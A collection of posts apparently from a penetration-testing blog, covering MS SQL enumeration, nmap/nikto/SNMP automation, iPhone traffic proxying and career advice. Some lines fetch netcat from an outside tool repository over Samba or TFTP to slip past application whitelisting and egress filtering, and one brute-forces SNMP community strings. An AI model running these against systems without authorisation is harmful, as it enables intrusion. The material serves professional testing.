xp_enumgroups– Enumerates Windows groups.

System Table Objects

Many of the system tables from earlier releases of SQL Server are now implemented as a set of views. These views are known as compatibility views, and they are meant for backward compatibility only. The compatibility views expose the same metadata that was available in SQL Server 2000. However, the compatibility views do not expose any of the metadata related to features that are introduced in SQL Server 2005 and later.

syscolumns (2000) – All column names and stored procedures for the current database
sysusers– All users who can manipulate the database
sysfiles– The file and pathname for the current database and its log file.
systypes– Data types defined by SQL or users.


Master DB Tables

sysconfigures– Current DB config settings.
sysdatabases– Lists all DBs on server
sysdevices–Enumerates devices used for DB
sysxlogins (2000) – Enumerates user info for each permitted user of the database
sql_logins (2005) – Enumerates user info for each permitted user of the database
sysremotelogins– Enumerates user info for all users permitted to remote access DB

Ports

The default ports for MS SQL are TCP/1433 and UDP/1434. However the service can be deployed ‘hidden’ on 2433 (this is MS’s idea of hiding!).

UDP 1434 was introduced in SQL 2000 and provides a referral service for multiple instances of SQL running on the same machine. The service listens on this port and returns the IP address and port number of the requested database.

Below is a script from MS TechNet showing the ‘fix’ for opening ports on Windows Firewall for MS SQL 2008. This is pretty interesting!

@echo =========  SQL Server Ports  ===================
@echo Enabling SQLServer default instance port 1433
netsh firewall set portopening TCP 1433 "SQLServer"
@echo Enabling Dedicated Admin Connection port 1434
netsh firewall set portopening TCP 1434 "SQL Admin Connection"
@echo Enabling conventional SQL Server Service Broker port 4022 
netsh firewall set portopening TCP 4022 "SQL Service Broker"
@echo Enabling Transact-SQL Debugger/RPC port 135
netsh firewall set portopening TCP 135 "SQL Debugger/RPC"
@echo =========  Analysis Services Ports  ==============
@echo Enabling SSAS Default Instance port 2383
netsh firewall set portopening TCP 2383 "Analysis Services"
@echo Enabling SQL Server Browser Service port 2382
netsh firewall set portopening TCP 2382 "SQL Browser"
@echo =========  Misc Applications  ==============
@echo Enabling HTTP port 80
netsh firewall set portopening TCP 80 "HTTP"
@echo Enabling SSL port 443
netsh firewall set portopening TCP 443 "SSL"
@echo Enabling port for SQL Server Browser Service's 'Browse' Button
netsh firewall set portopening UDP 1434 "SQL Browser"
@echo Allowing multicast broadcast response on UDP (Browser Service Enumerations OK)
netsh firewall set multicastbroadcastresponse ENABLE

It’s also worth bearing these other ports in mind when port scanning or enumerating instances of MS SQL.

We Have the Port Scans, what now?

$
0
0

It's been a while, I hope you're good. I'm fine thanks, busy as sin but isn't that always the way? So where did we leave off? From reading back through my previous post, we'd scanned our little guts out and pulled a list of all ports that were open and all the services that can be interacted with. Boy haven't we been busy! 

It just so happens that now is when the real fun begins. Have a bit of a perouse through the results, not that easy to read aye? Sure we can quickly find some 135, 445 and have a quick fiddle through the lovely lovely file shares, but where's the automation? This post should cover some basics about gathering even more data from the services we've identified using our ever faithful set of tools such as nikto, gnome-web-photo, curl et al and keeping the data useable.

First things first, let's bring all of our results together in a more machine readable way. From the previous post we've grabbed all of our nmap output into the three decent formats, plain, greppable and xml. For the purposes of this post we'll be using the xml format and parsing it using xmlstarlet (for those of you that aren't already using starlet, grab a copy, it's a brilliant little command line parser that I can't live without, nessus, nmap, surecheck, anything that dumps xml suddenly becomes friendly to use again!)

The little gem i've been using for a while now is:

cat port_scans/hot-targets.tcp.services | xmlstarlet sel -T -t -m "//state[@state='open']" -m ../../.. -v address/@addr -m hostnames/hostname -i @name -o '  (' -v @name -o ')' -b -b -b -o "," -m .. -v @portid -o ',' -v @protocol -o "," -m service -v @name -i "@tunnel='ssl'" -o 's' -b -o "," -v @product -o ' ' -v @version -v @extrainfo -b -n -| sed 's_^\([^\t ]*\)\( ([^)]*)\)\?\t\([^\t ]*\)_\1.\3\2_' | sort -n -t.

This is a slightly bastardised version of this oneliner brought to you from the lovely folks at redspin. It takes an nmap xml output file (singular in this case) and creates output like this:

10.13.37.10,22,tcp,ssh,OpenSSH 4.3protocol 2.0
10.13.37.10,2301,tcp,http,CompaqHTTPServer *** httpd
10.13.37.10,2381,tcp,http,Apache httpd SSL-only mode
10.13.37.10,3260,tcp,iscsi,
10.13.37.10,5988,tcp,http,Web-Based *** httpd
10.13.37.10,5989,tcp,https,Web-Based *** httpd
10.13.37.11,427,tcp,svrloc,
10.13.37.11,443,tcp,https,VMware ESXi Server httpd
10.13.37.11,5989,tcp,tcpwrapped,
10.13.37.11,8000,tcp,http-alt,
10.13.37.11,8042,tcp,fs-agent,
10.13.37.11,8045,tcp,unknown,
10.13.37.11,80,tcp,http,
10.13.37.11,8100,tcp,tcpwrapped,
10.13.37.11,902,tcp,vmware-auths,VMware Authentication Daemon 1.10

Isn't this a lot more greppable than -oG ? Having the data dumped out to csv allows us to rapidly move through and select the exact services we want to interogate. An example:

root@bt:~# cat output.csv | grep http
10.13.37.10,2301,tcp,http,CompaqHTTPServer *** httpd
10.13.37.10,2381,tcp,http,Apache httpd SSL-only mode
10.13.37.10,5988,tcp,http,Web-Based *** httpd
10.13.37.10,5989,tcp,https,Web-Based *** httpd
10.13.37.11,443,tcp,https,VMware ESXi Server httpd
10.13.37.11,8000,tcp,http-alt,
10.13.37.11,80,tcp,http, 

An even better example:

root@bt:~# cat output.csv | grep http | cut -f 1,2 -d "," | tr "," ":"
10.13.37.10:2301
10.13.37.10:2381
10.13.37.10:5988
10.13.37.10:5989
10.13.37.11:443
10.13.37.11:8000
10.13.37.11:80

An even better example still:

root@bt:~# cat output.csv | grep http | cut -f 1,2 -d "," | tr "," ":" | while read line; do /pentest/web/nikto/nikto.pl -config /pentest/web/nikto/nikto.conf -h $line -output $line.txt; done
....snip....

You get the idea.

While we're on the subject, a nice precursor to nikto is a bit of web scouring. We've all been in the situation before where we've been on a internal test with limited time only to discover 100 webservers spread across the network, it's always a case of best efforts and being left wondering if the ones we missed were the ones that would've bent over. This is where webscour comes in. It's a little script from Geoff over at Cyberis (Available here) that given a list of addresses grabs screenshots (using gnome-web-photo) and header information from each webserver and produces a handy html file to view them all from. Suddenly all the default content and HP OpenViews can be found quickly and we can move straight onto the Accounting App running Classic ASP on IIS4 that hasn't been in use for 5 years.

Incidently this can be run in a similar fashion to the one liner above:

root@bt:~# cat output.csv | grep http | cut -f 1,2 -d "," | tr "," ":" | ./webscour.pl webservers.htm

As you can imagine there is a lot more we can do with webservers, dirbuster, skipfish the sitekiller and any other forcedbrowse/fuzzer can usually be used in this way, and as always the more data the better.

Next steps as far as web servers are concerned usually involve getting this information into Burp, that way we can play with it properly. Buby is a sensible choice and further down the line we'll look into automated spidering and active scanning from the terminal, replaying nikto/dirbuster output directly into Burp and also utilising the FuzzDB to profile out any CMSs we come across. But that unfortunately will have to wait for another post.

As usual any thoughts, critiques or straight forward calling out either head down to the comments or hit me up on twitter. Hwyl am Nawr!

Final Thoughts

It wouldn't be fair if I weren't to go off topic at least once in a post so here you go....

cat output.csv | grep 161,udp | cut -f 1 -d "," | /pentest/enumeration/snmp/onesixtyone/onesixtyone -c /pentest/enumeration/snmp/onesixtyone/dict.txt -o onesixtyone.out -i -

Have some snmp fun ya'll!

HackArmoury.com - A Pentesticles Project!

$
0
0

Recently, we at Pentesticles took over the ownership and full development of HackArmoury.com. So, I thought it was time to write a blog post about it and speak a bit about what it does, how to use it and what we’re planning for it in the future. We'll be talking a bit about this tonight (12th July 2012) at 11pm UK time (6pm ET) on pauldotcom also, make sure you don't miss it!.

HackArmoury is something I’ve personally been involved in since its creation (by me ol’ mucka @nopslider) and has proven to be a useful resource for the Penetration Testing community. Ben and I are now putting a bit of focus on it and continuing its development and maintenance. I've also skinned the site since the change over, I'm still not sure about the Tango-orange colour. It's not a dig at gingers, honest.

So, what is HackArmoury? For those who haven’t used it, it’s essentially a tool repository for Ethical Hacking and Penetration testing. The key advantage is that HackArmoury can be accessed over loads of popular protocols including SVN, TFTP, HTTP, IPv6 and Samba (see below for the full list and instructions) and older versions of tools are maintained. This means that if there are network restrictions on where you’re trying to update from, you have the best chance of being able to connect and get your tools.

Another key feature of the site is that the entire repository of tools is packed into a single ISO, which can be downloaded directly. Each time a new tool is added, the ISO is updated and re-packed meaning that it’s always up-to-date.

Our next addition with be GIT, as this is an obvious hole. Once we sort the technical aspects and work out the security implications, we'll be ready to go! 

We're always looking for trustworthy contributors, so if you fancy helping us tool-up, please drop me an email at lawrence[at]hackarmoury.com or through the comments on this blog. In the meantime, I hope you enjoy using the site and it proves useful.

How can I connect? There are lots of ways to connect up, you can do this via the following methods:


IPv6 is now supported by HackArmoury (2a02:af8:1000:8c::2f98:4ed7). If you want to access us directly over IPv6, and you can't remember a 128bit address, use the hostname ipv6.hackarmoury.com. All of our common protocols will be supported.


You can access all your tools straight over Samba using \\hackarmoury.com\tools\. No authentication required, just start->run->\\hackarmoury.com\tools\ and you're away.

For example, to run nc.exe, simple type \\hackarmoury.com\tools\all_binaries\nc.exe. If running on a Windows host with executable black listing or whitelisting, it's always worth testing over Samba too. In many cases this execution method is permitted without consideration for the consequences.

HTTP

Everything in the toolkit is browseable over HTTP and HTTPS. Navigate directly to http://hackarmoury.com/tools and you're away.


To minimise download bandwidth, you can keep up-to-date with our tool set over Rsync. Use the following command to download after reading our licensing terms here:

rsync -avz rsync://hackarmoury.com/tools /ha

As with all other protocols, no authentication is required to download.


You can keep an offline copy of the armoury simply by doing a subversion checkout. If you're regularly running the tools, it makes much more sense to keep an offline copy for speed and portability. It’s a much more efficient way of keeping up-to-date with new tools, as you don't need to be scouting around the site or downloading large ISO images.

Simply type:

svn co svn://hackarmoury.com/live /ha

To update, navigate to your local directory and perform:

svn update


Executable files only are available over TFTP due to the inability of having a directory structure, and you must know the name of the file in advance.

You can download files like this:

tftp -i hackarmoury.com get nc.exe

You may find this useful in some poorly implemented egress filtering scenarios.

PaulDotCom Interview

$
0
0
A big thanks to Paul and Mike and Larry (and Carlos) for having us on the show, we really enjoyed it. Apologies for being a bit up-tight in places, but we're British, it's what we do. And, for the record, I like Nessus really (Printers don't) and SANS rock (apart from their examination style). You can check out the video of us chatting shite here: http://pauldotcom.com/2012/07/pentesticles-penetration-testi.html I'll be emailing Paul with some better 'your Network's shite' comments in the London vernacular! PENTESTICLES AWAY!!!!

Proxying 3G iPhone Data

$
0
0


Hey! It's been a while, I promised you guys that I'd do this more often and I've failed you and for that I am sorry (well sort of). So today I'm taking a break from automation to talk to you lovely folks about something I've been working on lately, proxying. Not just proxying, but proxying iPhone apps. No wait, not just proxying iPhone apps, but proxying iPhone apps traffic over 3G. Is there a setting for that? No! (At least there isn't in iOS 5, 6 does, but only through the configuration utility)

It was a pain in the ass, but it is possible with caveats. Firstly, the iPhone has to be jailbroken, secondly, you need to edit some config files. If you're cool with that read on.

Step 1

Jailbreak your phone.

Step 2

Edit the /private/var/preferences/SystemConfiguration/preferences.plist file.

Locate the "ip1" section:

<dict> 
<key>Interface</key> 
<dict> 
<key>DeviceName</key> 
<string>ip1</string> 
<key>Hardware</key> 
<string>com.apple.CommCenter</string>
 <key>Type</key>
 <string>com.apple.CommCenter</string>
 </dict> 

Then add the following section afterwards:

<key>Proxies</key> 
<dict>
 <key>ProxyAutoConfigEnable</key>
 <integer>1</integer>
 <key>ProxyAutoConfigURLString</key>
 <string>file:///private/var/preferences/proxy.pac</string> 
</dict>

Step 3

Create the following file: /private/var/preferences/proxy.pac

and add the following.

function FindProxyForURL(url, host)
{
return "PROXY YOUR_EXTERNAL_IP:8080";
}

Note: As this is over the 3G network, your proxy needs to be available on the internet, if you're planning on using burp I'd probably use a netcat tunnel to use your proxy on a box you have on EC2, alternatively just open up a port on your home router and use that.

Step 4

Fire up your proxy and restart your phone, it doesn't get much simpler than that.

Step X

Something I've been doing to make app testing a bit easier is use Veency, it's a VNC tool (available on Cydia) for your iPhone allowing you to interact with it via your PC, it makes life a lot easier when you have full use of your keyboard and mouse on your phone.

Proxying 3G traffic actually yielded some interesting results, certain apps that weren't even active authenticated (over plain text) with their servers on phone boot. I won't give away who here, but they have been notified that this is bad.

Hope that was somewhat useful, it was for me anyway, until next time, come say hello @bdpuk.

Byeeeeeeeeeeee.

De-duping multiple interface nessus results with sed.

$
0
0
A bit of a mouthful and not that useful for most, but this is saving me headaches left, right and centre at the moment (and is dead simple).

It's always an issue when testing a network that you can run into the same box multiple times with different addresses, this became all too apparent to me recently when I was testing 4 boxes with over 20 interfaces between them serving up different services. Now when it comes to reporting the customer isn't going to want to know about the same issues on the same ports on the same box multiple times, but  manually separating this lot out of Nessus is a nightmare.... sed to the rescue.

Lets assume that you have your Nessus output and have it it some useful parse-able format. (xmlstarlet anyone?)

lets also assume that you have a list of ips that match up to each hostname. First things first, create a ip2host.sed file and fill it with your replace statements, e.g.

s/192.168.0.1/host1/g
s/192.168.0.2/host1/g
s/192.168.0.3/host1/g
s/192.168.0.4/host1/g
s/192.168.0.5/host2/g
s/192.168.0.6/host2/g
s/192.168.0.7/host3/g
s/192.168.0.8/host3/g

Next step is nice and simple, either:

sed -f ip2host.sed << EOF | sort | uniq

and copy and paste your results into the terminal, ending with an EOF or...

sed -f ip2host.sed < fileofservices.txt | sort | uniq

if you've already saved the file. This will take:

192.168.0.1:443
192.168.0.2:443
192.168.0.3:443
192.168.0.5:25
etc

and convert it to:

host1:443
host2:25
etc.

Not a complicated one today, but always a handy one to remember.

Ben





What You Need To Know to Become a Penetration Tester

$
0
0
It really has been a long time since I last posted. This post is more of an essay, so it may be a TL;DR for some, but hopefully a there is some good information for those who wish to break into Penetration testing or at the very least something I can point people to next time I'm, asked.

As I’m sure is the experience of other Penetration Testers, I’m often asked (or see slapped across LinkedIn Forums) by a whole range of people “How do I break into Penetration testing?” or the like. The prospect of becoming a ‘professional hacker’ is all too enticing for graduates, IT professionals and even Information Security bods in other functional areas alike. Having answered this question and posed many a question in rebuttal, I decided to formalise my experiences, musings and advice into a single blog post. I hope it helps.

What is Penetration Testing?

To begin with, it’s always worth checking your understanding of what a Penetration tester actually is, does and some of the attributes belonging to the ‘good and great ones’. Being a Penetration tester is not the same as being (what the media often portray as) a hacker. To dispel a couple of myths about Penetration testing, it’s worth describing some of the aspects of the job in bullet points for brevity.
  • For most of the industry, a Penetration test does not involve development of 0-day exploits.
  • Normally, you get a very limited amount of time (days) to compromise systems that hackers would have months to do.
  • You always have to document your findings in a written report at the end of the test. Often, you will be asked to explain in detail some or all the findings to technical and non-technical audiences.
  • In a lot of cases, clients aren’t looking for a single route to domain admin. They’re interested in their broader attack surface and coverage across their whole estate. 
  • Business considerations, such as loss of earnings due to downtime and cost of engagement are much more important than you may initially think (or probably not consider at all before testing).

What makes a good tester?

I believe that there are quite a few considerations beyond raw technical knowledge that make a good tester. It’s key to remember again that Penetration testing is not ‘hacking’ and although there is a place for the borderline-autistic who hacks the Pentagon on their neighbours’ wireless, it’s more likely they’ll be suited to research or the Russian mafia. Again, I’ve added a bullet pointed list to describe some of what I consider key attributes of good and great testers that I consider when I hire non-experienced testers.

  • The right attitude – This is much more important than someone who’s done a course (CEH or the like). The truth is, I don’t believe that you can be a good Penetration tester if you’re not passionate about IT Security and moreover technology. It does need to be more than a job, as the up-skilling and constant personal development is not possible to maintain if your heart’s not in it. Also, you need to be fairly autodidactic (into self-learning) as even now there are few good core texts on most topics and they become outdated quickly. Most experienced tester will have gone through a huge amount of self-learning and will be resentful if you expect it on a plate (others just plain don’t want to share).
  • Good fundamentals – The best testers know a lot about a few things, but something about everything else. Despite some academiphobia (is that a word?) within the industry, I think that an IT related degree provides a great grounding in computer science and will stand you in good stead. Similarly, experienced sysadmins, network architects and developers should have good foundations on which to build. It’s common to find testers with big knowledge gaps, it’s really important to understand all areas of enterprise infrastructure to some degree in order to progress through the ranks.
  • Technical Prowess – At its core, Penetration testing is an extremely technical discipline. Not only do you need to understand how things work at a low level, you need to subvert controls in a repeatable way and learn constantly as new versions of software/hardware are released. The ability to code or script is always an advantage, even if you’re limited to simple bash scripting. However, some of the best testers I know can’t write code but can read and break very well indeed. That said, it will limit your vision and scope ultimately if you can’t. More on this later!
  • Soft and Written skills – Often overlooked, these skills are what separates Penetration testers from hackers and script kiddies. Ask yourself, would you as a client accept the work of someone who cannot write a coherent sentence, who cannot express simple issues in plain English and pay over £1000 per day for the pleasure? The key deliverable for the client is the written Report. Penetration testing companies require consultants who can read, write and speak English well. Unless you’re a total genius who’s finding 0-days nobody else can, they’re unlikely to overlook total ineptitude in this area.

Where to Start

In general, I would say that it’s almost impossible to get into a Penetration testing job at any level if you lack any exposure to computer science or hacking. It’s not like sales where you can start at the bottom with nothing and there are thousands of jobs.  
From my experience, there are four common starting points that lead people to the Penetration testing path. Apologies if this doesn’t fit your circumstances or I’ve left out anything that’s obvious.
  1. A school or college leaver who hacks as a hobby.
  2. An existing IT professional (e.g. Sys admin, Developer, Network Engineer)
  3. A recent graduate of Computer Science, Cyber Security or Ethical Hacking
  4. A graduate or experienced professional in another field
Scenario 1

In Penetration testing, having a lack of schooling and higher / further education isn’t necessarily a hindrance if you have some skill. However, you will likely need to prove this to a greater extent than perhaps a graduate would. Bug bounties are a great way to prove your prowess, with sites such as Bugcrowd paying sizeable winnings to the best bug hunters. If this is beyond your current skill level, it’s worth playing with some of the teaching frameworks such as Metasploit Unleashed or DVWA to hone your skill. It’s worth remembering that companies pay large amounts of money to recruiters, so if you approach them directly with a well-written CV, they’re likely to appreciate your enterprising spirit as well as the potential cost savings! If your CV is short or particularly unimpressive, you should pay particular attention to writing a covering letter or email. This should be well constructed and demonstrate your keenness to work for that company specifically (everyone likes a bit of mild flattery) and a bit about your background and aspirations. It’s worth noting that most (me included) organisations will throw out emails or CVs that are poorly written or full of mistakes at first sift. If you’re not grammatically gifted, ask someone who is to assist.

Scenario 2

Existing IT professionals already have quite a bit of skill (potentially) in a useful area. This is often quite attractive for Penetration testing companies as they understand general working practices and professionalism (one would hope!) and are often very keen! My advice would be to avoid expensive courses and retraining in order to land a job, but to focus on moving into a role as quickly as possible. There are plenty of cheap or free resources online to gain some basic knowledge around testing to move up to a level whereby you can hold a decent conversation in an interview or demonstrate working knowledge of Metasploit or Burpsuite on a rig. I always believe that attitude is more important than current skill-level with inexperienced hires, and spending £3k on a SANS course won’t make you start any higher in an organisation without testing experience. Great resources for this type of up-skill can be found on sites like SecurityTube, Udemy, OWASP (or just YouTube) and courses like Metasploit Unleashed and Mutilidae will help you reach initial goals.

Scenario 3

As a recent graduate, you have likely been exposed to good basics across a wide breadth of IT; some of it you may even remember. For those of you who have done a Computer Science degree and particularly enjoyed a security module or completed a Security or hacking related dissertation, you may feel the next step is to apply for a Penetration testing job. In this scenario, my advice would be to make totally sure it’s what you want to do and commit. As an interviewer, I’m always looking for a passion for security and some evidence of learning outside of University in this field, or as a minimum, a good security-focused FYP. If you’re lacking this, it will likely seem as though you don’t know what you want to do and you saw a couple of jobs being advertised for senior Penetration testers for up to £100k. For the people who’ve done a Security-related degree (or Masters) at Universities such as Abertay, Glamorgan, Kingston, Royal Holloway etc. you’re likely to get to the interview stage based on the specificity of your experience (as long as you got a reasonable grade).

Scenario 4

If you’ve no experience or qualifications in the field, then it’s likely to be a struggle to get an interview on the strength of your CV alone. I would advise the same approach as a School or College leaver, get ethically hacking and learning! An impassioned covering letter and interest in being an unpaid intern will often turn the heads of a hiring manager.

Industry Accreditation

This is probably the most frequent area of questioning I get when people ask me about moving into the industry. As the industry is so heavily focused on the CESG CHECK scheme, it’s best to separate the discussion into two parts, the CHECK scheme and other qualifications.
The CHECK scheme was initially set-up in response to the increased demand for skilled Penetration testing to be performed against HMG (Her Majesty’s Government) assets and CNI (Critical National Infrastructure) in the form of ITHC (IT Health Checks). In short, the Government didn’t have the funding to hire enough heads internally to complete all the work at the right level (or the salaries to tempt good testers away from industry). Therefore, the CHECK scheme was created as a framework to manage the subcontracting of this extra effort. A large amount of Penetration testing firms rely heavily on work from the CHECK scheme and it remains a huge source of income. Both companies and individuals can accredit to the scheme, with approved organisations deemed as ‘Green light’ should they satisfy the required criteria. 

The accreditation of individuals is quite complex, and even experienced testers still sometimes get confused by the different options. There are essentially two grades of Penetration tester within the scheme, CTL (CHECK team leader) and CTM (CHECK team member) with the former being the top tier. In order to achieve either of these levels the individual must pass an exam, hold SC clearance and work for a CHECK green light company. SC clearance can be attained by UK and Foreign nationals’ resident within the UK. However, if you’re not a British citizen you will often be caveated with ‘UK eyes only’ on your clearance, which will stop you from doing certain types of work. At the time of writing, the following table shows the possible examination paths to accreditation.

CHECK Team Leader
CHECK Team Leader (Infrastructure)
CREST Infrastructure Certification Examination (www.crest-approved.org)
Tiger Scheme Senior Security Tester (www.tigerscheme.org)
Cyber Scheme Team Leader Examination (www.thecyberscheme.co.uk)
CHECK Team Leader (Web applications)
CREST Certified Web Application Tester (www.crest-approved.org)
Tiger Scheme Web Application Tester (www.tigerscheme.org)
CHECK Team Member
CHECK Team Member
CREST Registered Tester Examination (www.crest-approved.org)
Tiger Scheme Qualified Security Tester Examination (www.tigerscheme.org)
Cyber Scheme Team Member Examination (www.thecyberscheme.co.uk)
Fig.1 - Taken from CESG website

The main difference between a CTL and a CTM (apart from the difficulty of the exams) is that a CTL must author the report and lead the testing. A CTM cannot work solo on a CHECK test. Therefore, a CTL is more valuable to a company that performs CHECK work as they can work alone, which makes scheduling more easy and it’s likely the tester is more highly utilised. The CTL grade subdivides into Web Applications and Infrastructure, however, there is currently no restriction on what type of work a CTL can perform either on their own or with other testers (i.e. a Web Application CTL can perform Infrastructure work solo).

Most testers will aspire to pass these exams, certainly when working within a CHECK Green light organisation, as their employer will either mandate or encourage it. The CTL exams are all-day and quite challenging, even for experienced testers. More information on the specifics of the exams can be found on the sites listed in the table above.

Other Industry Accreditations

There are loads of courses and accreditations out there, I have just listed and given a few lines about the courses and my opinions on each in order to give a flavour of the common ones.

CEH– The general consensus of testers in my experience is that CEH lacks technical detail and isn’t really a very good qualification for a Penetration Tester. However, I have not completed this exam myself and base my opinions on the experiences of trusted colleagues and the course syllabus and examination guides. I wouldn’t recommend this certification if you wish to be a Penetration tester.

OSCP / PWK by Offensive Security– This is a pretty technical course, which many of my team and colleagues have done. The course uses Kali Linux as a base operating system and runs you through a challenging series of labs exploring scripting in bash and python, the basics of exploit development and loads more. It’s online and give you VPN access to the various labs required for the course. In order to gain the OSCP qualification, you are required to submit coursework from the labs and complete a challenging exam over the course of 24hrs. Feedback on this has always been that it’s awesome and very challenging.

SANS Courses– Again, I have never been on a SANS course, but I have seen a lot of the material (having put some of my team through these), know a few instructors and have heard good things across the board. My one criticism is that most of the exams are multiple choice and not practical-based, which is a bit disappointing. That said, the instructors of the on-site courses are always excellent and if you can keep up you’ll learn a lot. I believe that it is more of a standard in the US to go after the GWAPT or GPEN exams.

BEWARE recruiters

I decided not to do a section on CVs, as I felt it was a bit patronising. Suffice to say, don’t send your CV across with any mistakes (spelling, grammar or otherwise), don’t leave any unexplained gaps and don’t in clude huge sections on your non-security related hobbies.
I supposed that finding a job often starts with recruiters, or at least LinkedIn. I have a hard time working out which is which nowadays, but it’s where I shall begin. For a lot of companies, recruiters are a necessary evil, but it’s best to attempt to avoid going through one unless it’s a necessity (some larger companies may mandate this route).

I have literally hundreds of horror stories about recruiters in Penetration testing, which I won’t bore you with, but be wary of sending them your CV (and moreover them getting hold of your CV, sending it to loads of companies then ringing you to see if you’re interested in any that bite). I would advise that you take their advice with a pinch of salt as most don’t understand the market. You can waste a lot of time being sent to far-flung places for inappropriate jobs that a recruiter persuaded you was a good idea (in order to make their quote of candidates to interviews). If you’re unsure, don’t be afraid to ask to speak to the company on the phone first to clarify the role is suitable.

I would advise that you approach reputable companies directly, you can find a list of CHECK Green light companies here for reference. 

If you’re following my advice and taking a direct approach, I would always advise that you check the company website first to see if they mention hiring on there. As I mentioned earlier, most organisations will see it as a positive thing if you track down the right person (or at least an appropriate one) on LinkedIn, send them a bespoke email introducing yourself and asking them about hiring and if they’d consider you for an interview. This saves them money, and shows a bit of initiative on your part.

The Interview Process

Most interviews I’ve done (as an interviewee and interviewer) for testing roles have all followed a fairly formulaic approach. They usually follow a two or three stage process with a mix of the following aspects:
·         
  • Phone-based – Some simple technical questions (Nmap flags, Port numbers, What’s a XSS? etc.) and to check you speak good English and have a brain.
  • Face-to-face (Technical) – This normally is a series of technical questions and a technical assessment on a rig of some kind, often with you explaining as you go or the interviewer(s) watching on another screen what you do. This can be very intimidating as they tend to bring in very senior technical people to watch. Normally this will be pretty basic like popping a box with MSF (using MS08-067) or basic XSS.
  • Face-to-face (Presenting / meet-the-director) – You may be asked to present a Penetration test report or prepare something to assess your interpersonal skills. Depending on the company, you may need to meet a higher level business representative such as a director or partner.
  • Face-to-face (General) – A general interview will have a mix of discovery questions, often using HR methodologies such as the STAR model. This type of interview will seek to find out a bit more about you as a person and your aspirations to check for a cultural fit.

Before you go to the interview, it’s always worth asking what will be required and if you need to prepare anything. Interviews are an opportunity to sell yourself, mention anything related to the field of penetration testing that you have done. I recall one specific interview with a very shy gentleman, he really struggled explaining to me some really basic concepts such as what port scanning was and had never heard of the OWASP top 10; things were taking a nose-dive. Suffice to say, he hadn’t done well and didn’t appear to have a clue about anything in security, after having quite a promising CV. At least until I asked him the question ‘what do you do in your spare time?’, to which he answered “oh, I like exploit development and malware reversing normally, you know that bug that was found in IE last week, that was me, I got £10k from Microsoft for that”. Totally mental that he didn’t mention that, even after I asked him the ubiquitous ‘tell me about yourself?’ at the start of the interview.


I hope that my post has provided a useful amount of information to aspiring Penetration testers, if you have any comments, criticisms or more questions please leave them below.

Penetration Testing: You’re Doing it Wrong (?) – Part One

$
0
0
Sexual innuendos aside, I've wanted to write an article about the unspoken thoughts of penetration testers (at least my own and the great testers I've been lucky enough to work with) for quite some time, but 100 hour weeks and international travel for work tend to get in the way! The main focus of this post is to describe the typical approaches of both the security assessment services industry and organisations that consume them. I have given particular focus to new attempts to make testing more realistic and how this compares to what I term as ‘Traditional Penetration Testing’. I also touch on actionable OSINT and Threat Intelligence, as well as Threat and Risk modelling as a function of assessments strategies. The context of this post assumes a medium to large sized organisation and at least a moderate level of maturity such as maintaining an accreditation framework such as PCI DSS or ISO27001.

What Do I Define as Traditional Penetration Testing?

I describe a traditional penetration test, in much the same way as industry and accreditation bodies do, which is in terms of application and infrastructure testing. Typically, a large organisation will have two main streams of testing that pinpoint the new and the old. Business as usual (BAU) testing, includes existing infrastructure and applications that are tested on an annual (or periodic) basis, which includes compliance driven assessments. Project-based testing often comprises wholly new applications and infrastructure that need to be assessed before going ‘live’. The two most common (in my experience) approaches to servicing this requirement are a penetration testing framework that involves multiple suppliers (often using a round-robin approach to avoid claims of inequality) and a single supplier approach. Additionally, it’s worth nothing that SMEs will typically use a single or multiple suppliers to service ad hoc requirements and will often create RFPs for each requirement.

So, Why is This Wrong?

One of the key criticisms of this approach is that it’s unrealistic. For example, performing an eight-day black box Web application penetration test in your staging environment, is the equivalent of building a temporary six-foot wall around your brand new house and attesting the security of the en-suite bathroom by getting a fat kid to lean against the front gate for a couple of hours and play knock-down-ginger with their bespectacled best friend. This criticism is something that I agree with, as tests often lack context, realism and their approach is based on improper calculation of the likelihood of attack and compromise. Often, this type of approach is justified due to the low business impact or revenue generation of the asset or cries of ‘industry best practice’. The truth is that baked-in ‘security as a feature’ - with its genesis in SDLC, secure architecture and user education – consistently provides better return on investment (not to be mistaken for cheapness) and more robust attack surfaces than atomic assessment of network sub-sets and standalone applications.

Moreover, many key elements of how threat actors will approach an attack are left out, as vectors such as (D)DoS attacks and social engineering are ubiquitously omitted from scopes. There are obviously ‘good’ reasons why this may be the case, such as cost, perceived ROI, perceived risk and legal implications. Fundamentally, most of these assumptions are wrong. There are ways of reducing these types of risks to acceptable levels for almost all scenarios - so why don’t people do it? I think the most correct answer is that the decision / policy makers don’t know how, and more importantly they don’t want to admit they don’t know how. It’s a very safe option to subscribe to conventional (circa 1995) wisdom and take an additive approach to anything new, giving a hat-tip and a wink to the industry and your peers that you’re at the forefront. This often involves tacking ‘bleeding edge’ services or appliances on to end-of-year budget surplus rather than questioning the value of what’s being done and going down the rabbit hole bottom-up (ooo err), armed with the detail of new approaches.

Another key cogitation, is the quality of testing and the ultimate understanding that’s passed on to those who design and create IT systems and infrastructures. As traditional penetration testing services are largely undifferentiated and a commodity (in the UK market), it’s difficult to know what ‘good’ is, even within the scope of a concept that is arguably broken. The industry is largely underpinned by the CESG CHECK scheme as a baseline for individual skill, with CTM and CTL status being used as metrics. In reality, the testing quality you get depends on the individual doing the testing, and not so much the company you hire (although this affects the overall experience as a consumer). As a minimum, most pen testing service providers will normally quote a framework or a baseline that they align to (such as OSTMM, PTES or NIST 800-155), have a defined methodology, and in lots of cases a checklist they follow when testing. A good example of a baseline is the OWASP top 10, used as a measure for assessing web applications. The OWASP top 10 is simply a list of the top 10 most common vulnerability categories discovered on the Internet by OWASP. The issue with these types of measures, is that your top 10, may not be the OWASP top 10 and you may be missing key tests due to lack of context and a one-size-fits all approach. From experience of testing frameworks, if a client gives a supplier 100 web applications to test over the course of the year it’s likely that most of the vulnerabilities discovered will be repeated again and again due to reuse of badly written libraries or learned mistakes during the development process and server build / configuration. How many paid-for hours could be negated by trending analysis, code review of re-used libraries, documentation of secure builds and hardening rather than testing what’s essentially the same application over and over again and finding the same issues. It’s not uncommon to see this carry over year on year, with a new testing firms being brought in to validate findings.

Conclusions

To conclude, I believe that a lot of the shortfalls in basic security hygiene come from the people running the show (read CISO, CTO, InfoSec Manager). There is a simple lack of understanding of Cyber threat / risk and how to quantify, prioritise and remediate. It’s a lot easier to not rock the boat, make a metaphorical pinkie swear with China and North Korea to the effect of ‘don’t ask don’t tell’, than to admit you don’t understand your attack surface or how to manage it.

And then?


I think that I've carried on quite enough for a single post about the issues, so I’ll be continuing in a new post on how I believe these issues can be remediated and a detailed discussion of: simulated attacks, CREST STAR and CBEST, the pitfalls of changing tact, and the risk of doing nothing.

